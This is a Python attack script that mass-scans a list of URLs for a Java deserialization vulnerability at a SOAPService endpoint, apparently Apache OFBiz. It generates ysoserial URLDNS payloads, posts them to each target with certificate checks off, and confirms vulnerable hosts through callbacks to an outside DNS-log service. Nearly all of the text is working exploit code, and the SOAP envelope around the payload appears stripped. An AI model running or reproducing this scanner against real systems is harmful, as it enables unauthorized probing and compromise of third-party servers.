#coding:utf-8 import binascii import os import requests import urllib3 import uuid urllib3.disable_warnings() def main(): if(not os.path.exists("target.txt")): exit("put url in target.txt! ") if(not os.path.exists("ysoserial.jar")): exit("where is ysoserial.jar?") dnslogdomain = requests.get("https://dns.xn--9tr.com/new_gen").text if(len(dnslogdomain.split(".")[0])!=8): exit("Maybe `dns.xn--9tr.com` is down..") print("[!] Your DnsLog Domain Is `{0}`".format(dnslogdomain)) dnslogresurl = "https://dns.xn--9tr.com/"+dnslogdomain.split(".")[0] with open("target.txt")as f: urls = f.readlines() uuids={} print("\n") print(" payload发送开始 ".center(50,"-")) for url in urls: url = url.strip() uid = uuid.uuid1().hex uuids[url]=uid cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1} > tmp".format(uid,dnslogdomain) r = os.popen(cmd) r.close() with open("tmp",'rb') as f: payload = binascii.hexlify(f.read()) data = '''

{0}

'''.format(payload.decode()) headers = { "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" } try: print("[-] Send payload to {0}".format(url)) requests.post(url+"/webtools/control/SOAPService",data=data,verify=False,headers=headers,timeout=5) except: pass print(" payload发送完毕 ".center(50,"-")) print("\n") print("---".center(50,"-")) success=[] res = requests.get(dnslogresurl).text for target in uuids: if(uuids[target] in res): print("[+] {0} 漏洞存在".format(target)) success.append(target) else: print("[!] {0} 漏洞不存在".format(target)) print("---".center(50,"-")) filename = uuid.uuid1().hex+".txt" with open(filename,"w") as f: f.write("\n".join(success)) print("[*] put res in {0}".format(filename)) if __name__ == "__main__": main()